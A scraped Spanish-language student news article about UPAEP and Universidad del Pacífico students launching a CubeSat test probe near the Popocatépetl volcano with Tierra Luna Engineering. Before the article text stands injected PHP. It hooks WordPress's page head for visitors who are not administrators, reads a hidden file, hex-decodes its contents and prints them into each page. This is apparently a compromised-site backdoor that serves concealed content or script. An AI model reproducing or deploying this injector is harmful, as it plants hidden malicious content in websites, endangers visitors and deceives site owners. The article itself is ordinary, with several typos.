if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Universitarios lanzan satélite para analizar el Volcán Popocatépetl – La Opinión Universitaria La Opinión Universitaria
Menu

Universitarios lanzan satélite para analizar el Volcán Popocatépetl

Por Diego Armando Cuautle/@dcuautle

Estudiantes de la Universidad Popular Autónoma del Estado de Puebla (UPAEP) y de la Universidad del Pacifico en colaboración con académicos y Tierra Luna Engineering realizaron el lanzamiento de maneta exitosa de un satélite tipo CubeSat que analizará la actividad del Volcán Popocatépetl.

En rueda de prensa, Héctor Simón Vargas, catedrático de la Facultad de Electrónica de UPAEP dijo que esto sirve como base para la construcción de un satélite que se lanzará bajo un convenio con la NASA.

“El experimento consistió en probar los componentes, los cuales se van a usar para el lanzamiento de CubeSat, un satélite que va a monitorear el ambiente de la zona volcánica, en su momento se estudiará el ambiente y los gases que se emiten del Popocatépetl y sus posibles afectaciones a la región”, explicó.

Cabe señalar que en dicho proyecto, además de los universitarios de UPAEP y la Universidad del Pacifico, también participó  la empresa Tierra Luna Engineering de quien es director el astronauta mexicano José Hernández Moreno.

“Es importante que se involucren distintas instituciones, ya que con esto se permite impulsar la induráis aeroespacial del país, que poco a poco tiene va teniendo mayor presencia y reconocimiento mundial gracias a proyectos que ha dado resultado”, destacó.

Por su parte,  Hernández Moreno comentó s la primera vez que en México se lanzan satélites tipo cubo que alcanzó en esta ocasión una altura de unos 40 kilómetros fue la altura que alcanzó la sonda, es decir, unos 113 mil pies, es decir, la quimiosfera.

Dijo que el lanzamiento del satélite desde las faldas del Popocatépetl fue exitoso porque se pudieron realizar diferentes pruebas de telemetría, resistencia y comunicación con la base ubicada sobre la superficie terrestre.

Indicó que en el 2018, será lanzado el CubeSat que será apoyado por la NASA con el fin de llevar a cabo los estudios del ambiente y en donde también estarán involucradas las autoridades de protección civil, de la Agencia Aeroespacial, entre otras.

 

  • No comments

    Deja una respuesta

    Tweets recientes